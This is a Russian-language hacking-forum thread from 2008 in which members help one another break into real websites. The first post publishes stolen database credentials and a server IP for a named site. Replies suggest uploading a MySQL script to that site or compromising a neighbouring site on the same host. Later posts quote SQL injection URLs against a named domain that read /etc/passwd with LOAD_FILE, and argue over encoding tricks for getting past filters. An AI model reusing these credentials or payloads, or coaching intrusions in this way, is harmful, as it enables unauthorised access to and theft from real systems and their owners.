Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    не получается подключится удаленно
    вот файл конфигурации бд может у вас получится
    Code:
    <? 
    $usuarios_sesion="Administrador";
    /*$sql_host="localhost";  	// Host, nombre del servidor o IP del servidor Mysql.
    $sql_usuario="";        // Usuario de Mysql a nivel remoto
    $sql_pass="";           // contraseсa de Mysql a nivel remoto
    $sql_db="purace_nuevo";   	// Base de datos que se usarб a nivel remoto.*/
    
    $sql_host="localhost";  	// Host, nombre del servidor o IP del servidor Mysql.
    $sql_usuario="purace_coconuco";        // Usuario de Mysql a nivel remoto
    $sql_pass="bsn7502Pur";           // contraseсa de Mysql a nivel remoto
    $sql_db="purace_newpurace";   	// Base de datos que se usarб a nivel remoto.
    
    $sql_tabla="usuarios"; 		// Nombre de la tabla que contendrб los datos de los usuarios
    $link=mysql_connect ($sql_host,$sql_usuario,$sql_pass) or die ('I cannot connect to the database because: ' . mysql_error());
    mysql_select_db ($sql_db,$link); 
    
    
    
     
    
    ?>
    
    ip 200.6.155.24
     
    2 people like this.
  2. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    А зачем делать Unhex(hex()) ? :)
     
    1 person likes this.
  3. none222

    none222 Guest

    Reputations:
    0
    в большинстве случаев не получается! Залей на сайт скрипт для работы с Мускул и подключайся локально
     
    1 person likes this.
  4. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    .Striker, может это из-за того , что кроме основных данных для подключения передаётся еще
    $usuarios_sesion="Administrador";

    Nek1t, для обхода фильтрации.
     
  5. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Например? Фильтрацию какого типа? Просто всегда без unhex(hex()) делал и как-то так получалось =)
     
  6. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    У меня нет примеров на все случаи жизнь. Вбей в гугле "unhex(hex(" и смотри где катит, где нет.
     
    1 person likes this.
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Никакую фильтрацию ты с помощью unhex(hex()) не обойдёшь :)

    Это делается при проблемах с кодировкой. При прогоне через unhex(hex()) на выходе получаем уже нормальную кодировку.
     
    4 people like this.
  8. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Подключица можно только с локальной тачки. Ломай соседний сайт, раз на этот не можешь ничего заливать.

    upd:

    jokester, А фильтрацию кавычек и прочих спец. символов? :)
     
    #3148 n0ne, 3 Sep 2008
    Last edited: 3 Sep 2008
    1 person likes this.
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Гм.. а как ты собираешься с помощью этого обходить фильтрацию ковычек?

    Фильтрацию где?
     
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    jokester, например в load_file()
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Покажи как , вот пост из топика SQL:

    Проверяем файл прив:

    http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12/*
    Есть файл

    Смотрим ковычки:

    http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12/*

    LOAD_FILE(\'/etc/passwd\')

    Экранирует

    Как их обойти с помощью unhex(hex()) ?
     
    1 person likes this.
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    jokester, подзапросами :D Да, перепутал с load_file() =\ Когда тулзу свою писал там функции так называл, вот у меня всё и перемешалось. Да, unhex(hex()) только чтоб с кодировкой не гадать. Можно конечно чё-нить придумать...только толку ноль. Извиняюсь :[
     
    1 person likes this.
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.milw0rm.com/exploits/2660

    Я так понял,что для его запуска нужен пхп интерпретатор ? А то на вертриго не пашет.
     
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    .Begemot., бред про $usuarios_sesion="Administrador";, на подключение к мускулу на 3306 порт это никак не влияет =\

    n0ne, $sql_host="localhost"; ещё не значит что подключение только с локалки, это просто для пшп срипта так написано. Что бы узнать наверняка надо лезть в mysql.user

    jokester, фильтрация != экранирование. Вообще непонимаю про чё вы говорите, unhex/hex, как и cast(), convert(), aes_decrypt() и тп используется при выводе в неправильной кодировке
    вообще то LOAD_FILE(0x2f657463 2f706173737764), здесь именно и идёт функция unhex, сама строчка /etc/passwd если её прогнать через функцию hex будет иметь вид 2f657463 2f706173737764, 0x ставиться для того что бы преоброзвать это дело в /etc/passwd
    т.е. 0x2f657463 2f706173737764 = unhex(2f657463 2f706173737764)
     
    #3154 Spyder, 3 Sep 2008
    Last edited: 3 Sep 2008
    2 people like this.
  15. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Вообще 0x - стандартный префикс указывающий, что далее идёт 16ная система счисления, а не 8ая и не просто символы, к примеру. Это не синоним функции unhex(). В этом ты не прав.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Spyder Вместо того что-бы сразу написать, прочитай весь диалог,поймёшь о чём был спор, может тогда будет попроще :)
    Да ? :D
     
    #3156 Kakoytoxaker, 3 Sep 2008
    Last edited: 3 Sep 2008
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Qwazar, ну я просто неправильзно выразился. Но смысл то понятен
    jokester, да я читал. Фильтрацию на самом деле можно обойти с помощью unhex(hex()), если это действительно фильтрация.
     
    1 person likes this.
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Spyder, везде где я видел в конфиге localhost - он был и в настройках. И соотв. то же самое и с удаленным подключением) По опыту сказал, а не по книжке :Р
     
    1 person likes this.
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ну просто удобнее указывать localhost
    конечно если в таблице user в поле host стоит типа mysql.site_heckera.com , то и в скрипте будет mysql.site_heckera.com, а если там % то скорее вксего будет localhost
    То что ты привёл не является правилом =) хотя я не спорю что в большинстве случаев если в скрипте localhost, то и в базе тоже самое
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Какую фильтрацию? В каком месте? Как её можно обойти? Я вообще не понимаю о чём идёт речь.

    Покажи на примере что ты имеешь ввиду
     
Thread Status:
Not open for further replies.